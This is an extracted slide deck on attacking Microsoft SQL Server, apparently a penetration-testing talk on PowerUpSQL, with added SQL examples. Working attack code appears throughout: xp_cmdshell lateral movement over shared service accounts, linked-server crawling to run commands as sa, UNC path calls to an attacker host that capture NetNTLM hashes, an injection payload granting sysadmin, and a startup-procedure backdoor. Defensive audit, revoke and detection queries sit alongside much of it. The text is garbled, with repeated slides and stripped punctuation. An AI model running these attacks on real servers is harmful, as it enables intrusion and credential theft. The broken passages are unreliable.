[Figure: Leveraging Shared MS SQL Server Service Accounts. Network zones: Internet, DMZ, Intranet. Components: LRA, HVA, LVA, ADS; ports 80 and 443 exposed to the Internet, ports 1433 and 1434 on the inside. Attack path: (1) SQL Injection against the LVA; (2) Execute local command via xp_cmdshell; (3) Execute commands and gather data from other database servers via osql, giving access to the HVA with the shared domain service account. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling Server Links
What's a database link?
Database links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
  SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
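An inventory query for the two link conditions the slide relies on: a link whose login mapping is a fixed high-privilege remote login (the deck's "DB Link with SA account"), and a catch-all mapping that every local login, public included, can use. Added example, not from the original deck or PowerUpSQL; it reads only the catalog views sys.servers and sys.linked_logins and flags the findings to review.

```sql
-- Run on each instance. A row per (link, local login) mapping.
SELECT  s.name                         AS link_name,
        s.data_source,
        s.provider,
        s.is_rpc_out_enabled,          -- required for EXEC ... AT link (xp_cmdshell over a link)
        s.is_data_access_enabled,      -- required for OPENQUERY
        CASE ll.local_principal_id
             WHEN 0 THEN '<all logins>'               -- catch-all mapping
             ELSE SUSER_NAME(ll.local_principal_id)
        END                            AS local_login,
        CASE
             WHEN ll.uses_self_credential = 1 THEN '<self: caller''s own credentials>'
             WHEN ll.remote_name IS NULL      THEN '<no mapping: connection refused>'
             ELSE ll.remote_name
        END                            AS remote_login,
        CASE
             WHEN ll.remote_name = 'sa'
                  THEN 'HIGH: fixed sa mapping, every caller is sysadmin on the remote'
             WHEN ll.local_principal_id = 0 AND ll.remote_name IS NOT NULL
                  THEN 'REVIEW: fixed remote credential usable by all local logins'
             WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 1
                  THEN 'INFO: pass-through; remote rights equal the caller''s own'
             ELSE ''
        END                            AS finding
FROM    sys.servers s
JOIN    sys.linked_logins ll ON ll.server_id = s.server_id
WHERE   s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;
```

Remote logins other than sa that are sysadmin on the target cannot be identified from the local catalog; confirm them on the remote instance.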
[Figure: Leveraging MS SQL Database links. Same zones and components as the previous figure (Internet, DMZ, Intranet; LRA, HVA, LVA, ADS; ports 80 and 443, 1433 and 1434). Attack path: (1) SQL Injection against the LVA, whose database server DB1 is chained to other servers through links labelled "DB Link with Least Privileges" and "DB Link with SA account"; (2) Execute SQL queries and local commands on database servers via nested linked services. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we've seen.
Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker
• An attacker can then capture the NetNTLM password hash and crack or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges: UNC Path Injection
Oh yeah...
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path:
xp_dirtree, xp_fileexists

Escalating Privileges: UNC Path Injection
So in summary...
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.

Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
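Defensive counterpart to the slides above, added here as an example (not from the original deck or PowerUpSQL): audit who can execute the file-path procedures, remove the default grant to public, and log any remaining call that carries a UNC path. The Extended Events session name and file name are assumed; note that the server spells the second procedure xp_fileexist, without the trailing s used on the slide.

```sql
USE master;
GO
-- 1. Audit: which principals may execute the file-path procedures today?
SELECT o.name                             AS procedure_name,
       USER_NAME(p.grantee_principal_id)  AS grantee,
       p.permission_name, p.state_desc
FROM   sys.database_permissions p
JOIN   sys.all_objects o ON o.object_id = p.major_id
WHERE  p.class = 1          -- object-level permissions only
  AND  o.name IN ('xp_dirtree', 'xp_fileexist', 'xp_subdirs', 'xp_getfiledetails');
GO
-- 2. Remediate: drop the default grant to public. Test first; some backup and
--    maintenance tooling calls these procedures under its own login.
REVOKE EXECUTE ON dbo.xp_dirtree   FROM public;
REVOKE EXECUTE ON dbo.xp_fileexist FROM public;
GO
-- 3. Detect: capture any remaining call whose argument contains "\\", with the
--    login and client that issued it. A UNC path from an application login or
--    an unexpected host is the forced-authentication pattern described above.
CREATE EVENT SESSION [xp_unc_path_calls] ON SERVER
ADD EVENT sqlserver.sql_statement_completed (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname,
            sqlserver.client_app_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(statement, N'%xp_dirtree%\\%')
       OR sqlserver.like_i_sql_unicode_string(statement, N'%xp_fileexist%\\%')),
ADD EVENT sqlserver.sp_statement_completed (      -- same call made inside a procedure
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname,
            sqlserver.client_app_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(statement, N'%xp_dirtree%\\%')
       OR sqlserver.like_i_sql_unicode_string(statement, N'%xp_fileexist%\\%'))
ADD TARGET package0.event_file (SET filename = N'xp_unc_path_calls.xel')
WITH (STARTUP_STATE = ON);
GO
ALTER EVENT SESSION [xp_unc_path_calls] ON SERVER STATE = START;
GO
```

Forward the .xel output to the SIEM and alert on any event whose server_principal_name is not a known maintenance login.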
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
...what? It's self descriptive.
Escalating Privileges: OS Admin to SysAdmin
Two things to know...
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Approach            | 2000 | 2005 | 2008 | 2012 | 2014 | 2016
LSA Secrets         |  x   |  x   |  x   |  x   |  x   |  x
Local Administrator |  x   |  x   |      |      |      |
LocalSystem         |  x   |  x   |  x   |      |      |
Process Migration   |  x   |  x   |  x   |  x   |  x   |  x
Token Stealing      |  x   |  x   |  x   |  x   |  x   |  x
Single User Mode    |      |  x   |  x   |  x   |  x   |  x
Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options:
Approach | Common Tools
Access as Local Administrator | Management Studio, sqlcmd, and other native SQL client tools
Access as LocalSystem | PsExec, accessibility options, debugger, with native SQL client tools
Recover SQL Server service account password from LSA Secrets | Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process | Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from the SQL Server service process | Metasploit Incognito, Invoke-TokenManipulation
Single User Mode | DBATools
Common Post Exploitation Activities
Post Exploitation Overview
Common Post Exploitation Activities
1. Establish Persistence
• SQL Server Layer: startup procedures, agent jobs, triggers, modified code
• OS Layer: Registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
• All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• Members of the db_owner role can create procedures that run as the actual database owner, and the owner is often a sysadmin

Pros
• Can execute queries/commands in another user's context
• Limit commands and queries
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• db_owner can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires the database to be configured as TRUSTWORTHY for OS command execution (and for any other server-level action taken from the owner's context)
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions

Example: a db_owner member escalates to sysadmin through the owner's context (sp_addsrvrolemember is the deprecated form; ALTER SERVER ROLE sysadmin ADD MEMBER is the 2012+ equivalent)

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser', 'sysadmin'
GO

SYSADMIN is often the OWNER
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• Use signed procedures instead:
  o Create the stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure the login's privileges
  o Sign the stored procedure with the certificate
  o GRANT EXECUTE to the user

Pros
• Can execute queries/commands in another user's context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as TRUSTWORTHY for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
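The signed-procedure recipe above, worked end to end. This is an added example, not code from the original deck or from PowerUpSQL; the database, user, procedure, certificate, login, file path and passphrase are all assumed names. It packages VIEW SERVER STATE into one procedure so that MyAppUser can see who is connected without TRUSTWORTHY, without EXECUTE AS, and without any direct server-level grant to the user.

```sql
-- Added example (not from the original deck). Assumed names: MyAppDb, MyAppUser,
-- usp_WhoIsConnected, SignWhoIsConnectedCert, SignWhoIsConnectedLogin, C:\temp.
USE MyAppDb;
GO
-- 1. The procedure: one bounded task. sys.dm_exec_sessions shows only the
--    caller's own session unless the executing context holds VIEW SERVER STATE.
CREATE PROCEDURE dbo.usp_WhoIsConnected
AS
BEGIN
    SET NOCOUNT ON;
    SELECT session_id, login_name, host_name, program_name, login_time
    FROM sys.dm_exec_sessions
    WHERE is_user_process = 1;
END;
GO
-- 2. Database master key (skip if the database already has one) and a
--    certificate to sign with.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'Replace-with-a-long-random-passphrase-1!';
CREATE CERTIFICATE SignWhoIsConnectedCert WITH SUBJECT = 'Signs dbo.usp_WhoIsConnected';
GO
-- 3. Sign the procedure. Any ALTER PROCEDURE drops the signature, so a modified
--    body silently loses the packaged permission instead of inheriting it.
ADD SIGNATURE TO dbo.usp_WhoIsConnected BY CERTIFICATE SignWhoIsConnectedCert;
GO
-- 4. Export only the public part of the certificate, recreate it in master and
--    create a login from it. A certificate login has no password and cannot be
--    used to connect; it exists purely to carry server permissions.
BACKUP CERTIFICATE SignWhoIsConnectedCert TO FILE = 'C:\temp\SignWhoIsConnectedCert.cer';
GO
USE master;
GO
CREATE CERTIFICATE SignWhoIsConnectedCert FROM FILE = 'C:\temp\SignWhoIsConnectedCert.cer';
CREATE LOGIN SignWhoIsConnectedLogin FROM CERTIFICATE SignWhoIsConnectedCert;
-- 5. Grant the certificate login exactly the permission the procedure needs.
GRANT VIEW SERVER STATE TO SignWhoIsConnectedLogin;
GO
USE MyAppDb;
GO
-- 6. Let the application user execute the procedure; nothing else changes for it.
GRANT EXECUTE ON dbo.usp_WhoIsConnected TO MyAppUser;
GO
-- Verify while connected as MyAppUser: the procedure lists every user session,
-- while the same SELECT run directly still shows only the caller's session.
--   EXEC dbo.usp_WhoIsConnected;
--   SELECT session_id, login_name FROM sys.dm_exec_sessions WHERE is_user_process = 1;
```

Two caveats that matter for the "SQL injection under specific conditions" con above: permissions carried by a signature do not extend to dynamic SQL (EXEC or sp_executesql) run from inside the signed procedure, and the signature is dropped the moment the procedure is altered, so an attacker who can rewrite the body gains nothing from the certificate. Keep the delete of the .cer file and the BACKUP path on an access-controlled location; the file holds only the public key, but it is still the thing that gets recreated in master.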
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
    @DbName varchar(max)
AS
BEGIN
    DECLARE @query AS varchar(max)
    -- @DbName is concatenated straight into the statement text: a single quote in
    -- the input ends the LIKE literal and whatever follows is executed as SQL
    SET @query = 'SELECT name FROM master..sysdatabases WHERE name LIKE ''%' + @DbName + '%'' OR name=''tempdb'''
    EXECUTE(@query)
END
GO
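Added example, not code from the original deck: the injection against the sp_sqli2 procedure above with the payload spelled out, followed by a rewrite that cannot be broken out of. MyAppUser is an assumed login that the attacker controls.

```sql
-- Added example (not from the original deck). Assumes sp_sqli2 from the slide
-- above exists and that MyAppUser is a login the attacker controls.

-- Intended use: a search string.
EXEC sp_sqli2 'master';

-- Attack: close the LIKE literal, append a statement, comment out the rest.
-- The string the procedure receives is
--   master';EXEC sp_addsrvrolemember 'MyAppUser','sysadmin';--
-- so the concatenated @query becomes
--   SELECT name FROM master..sysdatabases WHERE name LIKE '%master';EXEC sp_addsrvrolemember 'MyAppUser','sysadmin';--%' OR name='tempdb'
-- If the procedure was created WITH EXECUTE AS OWNER in a TRUSTWORTHY database
-- whose owner is a sysadmin, the appended statement runs as that owner; without
-- EXECUTE AS it runs as the caller and only succeeds if the caller is sysadmin.
EXEC sp_sqli2 'master'';EXEC sp_addsrvrolemember ''MyAppUser'',''sysadmin'';--';

-- Hardened rewrite: the search string is handed to sp_executesql as a parameter,
-- so it is data and never part of the statement text. No EXECUTE AS, no string
-- concatenation, and sysname instead of varchar(max) bounds the input length.
-- (% and _ in the input still act as LIKE wildcards; escape them if that matters.)
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM sys.databases '
      + N'WHERE name LIKE N''%'' + @p + N''%'' OR name = N''tempdb'';';
    EXEC sp_executesql @query, N'@p sysname', @p = @DbName;
END;
GO

-- The same payload is now just a search term that matches no database name.
EXEC dbo.sp_sqli2_fixed N'master'';EXEC sp_addsrvrolemember ''MyAppUser'',''sysadmin'';--';
```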
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. Sysadmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
Leveraging Shared MS SQL Server Service Accounts
[Diagram, four build slides: Internet -> DMZ -> Intranet. Web tier reachable on ports 80 and 443; an LVA SQL Server and an HVA SQL Server on ports 1433 and 1434, both in the ADS domain. Key: HVA = High Value Application, LVA = Low Value Application. Steps shown for "Captain Evil":
1. SQL injection into the LVA from the Internet
2. Execute local command via xp_cmdshell
3. Access to the HVA with the shared domain service account; execute commands and gather data from other database servers via osql]
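Added example, not code from the original deck: the hop from step 2 to step 3 of the diagram above, then the query a defender runs to see which account that hop rides on. HVA-SQL01 is an assumed server name and everything here runs as sysadmin on the first, already compromised, instance.

```sql
-- Added example (not from the original deck). HVA-SQL01 is an assumed target;
-- all statements run as sysadmin on the first (compromised) server.

-- Step 2: enable xp_cmdshell and confirm whose token OS commands get. For a
-- sysadmin caller that is the engine's service account, not a proxy account.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC master..xp_cmdshell 'whoami';   -- the account the engine runs as

-- Step 3: that Windows identity is accepted by every other instance the same
-- account runs, and sqlcmd -E (osql -E on older hosts) authenticates with it.
-- The only question is whether it is sysadmin over there as well.
EXEC master..xp_cmdshell
    'sqlcmd -E -S HVA-SQL01 -Q "SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')"';
-- Data comes back the same way (written to a file the attacker then reads).
EXEC master..xp_cmdshell
    'sqlcmd -E -S HVA-SQL01 -Q "SELECT name FROM sys.databases" -o C:\Windows\Temp\hva_dbs.txt';

-- Defender check: which account runs the engine? Run on every instance; the
-- same service_account repeated across many servers is the finding.
-- (Needs VIEW SERVER STATE; sys.dm_server_services exists from 2008 R2 SP1.)
SELECT @@SERVERNAME AS instance, servicename, service_account
FROM sys.dm_server_services
WHERE servicename LIKE 'SQL Server (%';
```

Per-instance service accounts (or group Managed Service Accounts) turn step 3 into a dead end, and the audit query is the quickest way to measure how far from that an estate is.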
Escalating Privileges
Crawling Server Links

Escalating Privileges: Crawling Server Links
What's a database link?
Database links (linked servers) are basically persistent database connections between SQL Servers
Why should I care?
Short answer = privilege escalation
• The public role can use links to execute queries on remote servers, in the context of whatever login the link was configured with (impersonation)
  SELECT * FROM OPENQUERY([SQLSERVER2], 'SELECT @@VERSION')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
Leveraging MS SQL Database Links
[Diagram, four build slides: same Internet -> DMZ -> Intranet layout, with DB1 (LVA) and an HVA SQL Server in the ADS domain; ports 80 and 443 to the web tier, 1433 and 1434 to SQL. Key: HVA = High Value Application, LVA = Low Value Application. Steps shown for "Captain Evil":
1. SQL injection into the LVA
2. Execute SQL queries and local commands on database servers via nested linked servers: DB1 has a link configured with least privileges, and a further link downstream is configured with the SA account]
Escalating Privileges: Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of the environments we've seen
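Added example, not code from the original deck: what the link crawl on the previous slides looks like from a low-privileged login, one hop and two hops out, and what to check in the link definitions. SQLSERVER2 and SQLSERVER3 are assumed server names.

```sql
-- Added example (not from the original deck). SQLSERVER2 / SQLSERVER3 are assumed.

-- 1. Enumerate links and how they authenticate. A row whose local_login is
--    '<all logins>' with a fixed remote_name means every local login, public
--    included, reaches the remote server as that one account.
SELECT s.name, s.data_source, s.is_rpc_out_enabled,
       COALESCE(p.name, '<all logins>') AS local_login,
       l.uses_self_credential,          -- 1 = pass through the caller's own Windows identity
       l.remote_name                    -- fixed remote login when not self-mapped
FROM sys.servers s
LEFT JOIN sys.linked_logins l    ON l.server_id = s.server_id
LEFT JOIN sys.server_principals p ON p.principal_id = l.local_principal_id
WHERE s.is_linked = 1;

-- 2. One hop: who are we on the other side?
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT @@SERVERNAME AS srv, SYSTEM_USER AS login_name, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');

-- 3. Two hops: the remote server's own links, crawled with nested OPENQUERY.
--    Every nesting level doubles the single quotes.
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT * FROM OPENQUERY([SQLSERVER3],
        ''SELECT @@SERVERNAME AS srv, SYSTEM_USER AS login_name, IS_SRVROLEMEMBER(''''sysadmin'''') AS is_sysadmin'')');

-- 4. When the mapped login is sysadmin at the far end and the link has RPC Out
--    enabled, statements run there as that server's service account.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQLSERVER2];
EXEC ('EXEC master..xp_cmdshell ''whoami''') AT [SQLSERVER2];

-- Hardening: map links to a least-privileged remote login rather than sa, and
-- leave RPC Out off unless a workload actually needs EXEC ... AT.
EXEC sp_serveroption @server = N'SQLSERVER2', @optname = N'rpc out', @optvalue = N'false';
```

Step 1 is the defender's query as much as the attacker's: a link mapped to sa for all logins, on a server where hundreds of domain users are in public, is the whole escalation path in one row.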
Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker
• An attacker can then capture the NetNTLM password hash and crack or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Oh yeah...
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path: xp_dirtree and xp_fileexist
So in summary...
The PUBLIC role can obtain the SQL Server service account's NetNTLM password hash by default
But who really has PUBLIC role access?
Oh yeah, a ton of domain users
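Added example, not code from the original deck or from PowerUpSQL: the two public-executable procedures above pointed at a UNC path, then the audit and hardening statements a defender runs afterwards. 10.0.0.5 is an assumed attacker-controlled host running an SMB listener (the listener itself, e.g. Responder or ntlmrelayx, is not shown).

```sql
-- Added example (not from the original deck). 10.0.0.5 is an assumed host where
-- the attacker runs an SMB listener; any login in public can execute these.
EXEC master..xp_dirtree '\\10.0.0.5\share', 1, 1;     -- depth 1, include files
EXEC master..xp_fileexist '\\10.0.0.5\share\x.txt';    -- same outbound SMB auth
-- Either call makes the SQL Server service account authenticate to 10.0.0.5 with
-- NTLM before the share can be inspected; the listener records the NetNTLMv2
-- challenge/response to crack offline, or relays it to another host.

-- Defender side 1: what runs the service, i.e. whose credential just left?
-- (sys.dm_server_services needs VIEW SERVER STATE; present from 2008 R2 SP1.)
SELECT servicename, service_account, startup_type_desc
FROM sys.dm_server_services;

-- Defender side 2: who can reach the file-path procedures? Both ship in master
-- with EXECUTE granted to public.
USE master;
SELECT OBJECT_NAME(pe.major_id) AS procedure_name,
       pr.name AS grantee, pe.permission_name, pe.state_desc
FROM sys.database_permissions pe
JOIN sys.database_principals pr ON pr.principal_id = pe.grantee_principal_id
WHERE pe.class = 1
  AND pe.major_id IN (OBJECT_ID('master.dbo.xp_dirtree'), OBJECT_ID('master.dbo.xp_fileexist'));

-- Defender side 3: take the two procedures away from public (test first; some
-- tooling calls them). The lasting fix sits outside SQL Server: block outbound
-- SMB (TCP 445/139) from database hosts, and require SMB signing on targets so
-- that captured authentication cannot be relayed.
REVOKE EXECUTE ON dbo.xp_dirtree FROM public;
REVOKE EXECUTE ON dbo.xp_fileexist FROM public;
```

Note that revoking these two only closes the convenient path: any other procedure the login can reach that takes a file path (BULK INSERT, backup and restore, OPENROWSET with BULK) triggers the same outbound authentication, which is why the network controls are the real mitigation.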
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
...what? It's self descriptive
Escalating Privileges
OS Admin to SysAdmin

Escalating Privileges: OS Admin to SysAdmin
Two things to know...
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges

Approach              2000  2005  2008  2012  2014  2016
LSA Secrets            x     x     x     x     x     x
Local Administrator    x     x
LocalSystem            x     x     x
Process Migration      x     x     x     x     x     x
Token Stealing         x     x     x     x     x     x
Single User Mode       x     x     x     x     x     (5 of 6 versions marked; which column is blank was lost in extraction)

Below are some options for leveraging that knowledge.

Escalating Privileges: OS Admin to SysAdmin
Here are some tool options
Approach                                                        Common Tools
Access as Local Administrator                                   Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                           PsExec, accessibility options, debugger, with native SQL client tools
Recover SQL Server service account password from LSA Secrets    Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process     Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from the SQL Server service process  Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                                DBATools
Common Post Exploitation Activities

Post Exploitation Overview
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry and file auto-runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
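Added example, not code from the original deck or from PowerUpSQL, for the SQL Server layer of item 1 above: one startup-procedure backdoor planted so the audit has something to find, then the catalog queries that surface each persistence point listed. usp_startup_demo and the temp file path are assumed names.

```sql
-- Added example (not from the original deck). usp_startup_demo is an assumed
-- name, created only so the audit queries below have a hit; it is removed at the end.
USE master;
GO
-- Attacker side: a startup procedure runs as the service account every time the
-- instance starts. It must live in master, be owned by dbo and take no parameters.
CREATE PROCEDURE dbo.usp_startup_demo
AS
    EXEC master..xp_cmdshell 'whoami > C:\Windows\Temp\boot.txt';
GO
EXEC sp_procoption @ProcName = N'dbo.usp_startup_demo', @OptionName = 'startup', @OptionValue = 'on';
GO

-- Defender side: enumerate the SQL-layer persistence points.
-- Startup procedures (requires 'scan for startup procs', which is on by default).
SELECT name, modify_date
FROM master.sys.procedures
WHERE OBJECTPROPERTY(object_id, 'ExecIsStartup') = 1;

-- Server-scoped triggers (LOGON and DDL), which fire for every login.
SELECT name, type_desc, is_disabled, modify_date
FROM sys.server_triggers;

-- Agent jobs whose steps run a shell or PowerShell, or reach xp_cmdshell from T-SQL.
SELECT j.name AS job, j.enabled, s.step_name, s.subsystem, LEFT(s.command, 120) AS command_head
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobsteps s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell') OR s.command LIKE '%xp_cmdshell%';

-- Modules changed in the last week in the current database (run per database).
SELECT name, type_desc, modify_date
FROM sys.objects
WHERE type IN ('P', 'TR', 'FN', 'IF', 'TF', 'V')
  AND modify_date > DATEADD(day, -7, SYSDATETIME())
ORDER BY modify_date DESC;

-- Remove the demo backdoor.
EXEC sp_procoption N'dbo.usp_startup_demo', 'startup', 'off';
DROP PROCEDURE dbo.usp_startup_demo;
GO
```

Run the four SELECTs from a scheduled job that diffs against a stored baseline: a new startup procedure or server trigger is rare enough in production that any delta deserves a look.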
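Added example, not code from the original deck or from PowerUpSQL, for item 2 above: a T-SQL Luhn check, the catalog query that picks candidate columns by name, and a sampling query that pattern-matches first and validates with Luhn second. The CustomerNotes table and its three rows are constructed test data (the numbers are standard test values, not real cards) so the example runs offline.

```sql
-- Added example (not from the original deck or PowerUpSQL). dbo.CustomerNotes
-- and its rows are constructed test data.

-- 0. Where to look first: the biggest databases, and the ones someone thought
--    worth protecting with TDE (which is transparent to a sysadmin anyway).
SELECT d.name, d.is_encrypted, SUM(mf.size) * 8 / 1024 AS size_mb
FROM sys.databases d
JOIN sys.master_files mf ON mf.database_id = d.database_id
GROUP BY d.name, d.is_encrypted
ORDER BY size_mb DESC;
GO

-- 1. Luhn check: strip separators, require 12-19 digits, then double every
--    second digit from the right and compare the digit sum modulo 10.
CREATE FUNCTION dbo.IsLuhnValid(@s nvarchar(64))
RETURNS bit
AS
BEGIN
    DECLARE @d nvarchar(64) = REPLACE(REPLACE(@s, N' ', N''), N'-', N'');
    IF @d IS NULL OR @d LIKE N'%[^0-9]%' OR LEN(@d) < 12 OR LEN(@d) > 19
        RETURN 0;
    DECLARE @sum int = 0, @i int = LEN(@d), @pos int = 0, @n int;
    WHILE @i >= 1
    BEGIN
        SET @n = CAST(SUBSTRING(@d, @i, 1) AS int);
        IF @pos % 2 = 1 SET @n = @n * 2;      -- every second digit from the right
        IF @n > 9 SET @n = @n - 9;
        SET @sum += @n;
        SET @i -= 1;
        SET @pos += 1;
    END;
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END;
GO

-- 2. Constructed sample data: an innocently named table with one column that
--    holds card-number-shaped values.
CREATE TABLE dbo.CustomerNotes (id int IDENTITY(1,1), note nvarchar(64), pan_ref nvarchar(32));
INSERT INTO dbo.CustomerNotes (note, pan_ref) VALUES
    (N'renewal call',   N'4111 1111 1111 1111'),   -- standard Luhn-valid test number
    (N'ticket 4410',    N'4111-1111-1111-1112'),   -- digits, but fails Luhn
    (N'address change', N'order-2021-0042');       -- not a number at all
GO

-- 3. Candidate columns by name in the current database (wrap in sp_MSforeachdb
--    or a cursor over sys.databases to cover the instance).
SELECT s.name AS [schema], t.name AS [table], c.name AS [column], ty.name AS [type]
FROM sys.columns c
JOIN sys.tables  t  ON t.object_id = c.object_id
JOIN sys.schemas s  ON s.schema_id = t.schema_id
JOIN sys.types   ty ON ty.user_type_id = c.user_type_id
WHERE c.name LIKE '%card%' OR c.name LIKE '%pan%' OR c.name LIKE '%ssn%' OR c.name LIKE '%password%';

-- 4. Sample a candidate column: cheap pattern first, Luhn second, so that order
--    numbers and ticket ids do not end up in the report.
SELECT TOP (100) id, pan_ref, dbo.IsLuhnValid(pan_ref) AS luhn_ok
FROM dbo.CustomerNotes
WHERE pan_ref LIKE '%[0-9][0-9][0-9][0-9]%'
  AND dbo.IsLuhnValid(pan_ref) = 1;
```

Luhn only removes the obvious false positives; a 16-digit invoice number passes it one time in ten, so treat a hit as a reason to sample more rows, not as proof.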
2 Get principal id for the sa account with ldquosuser_idrdquo
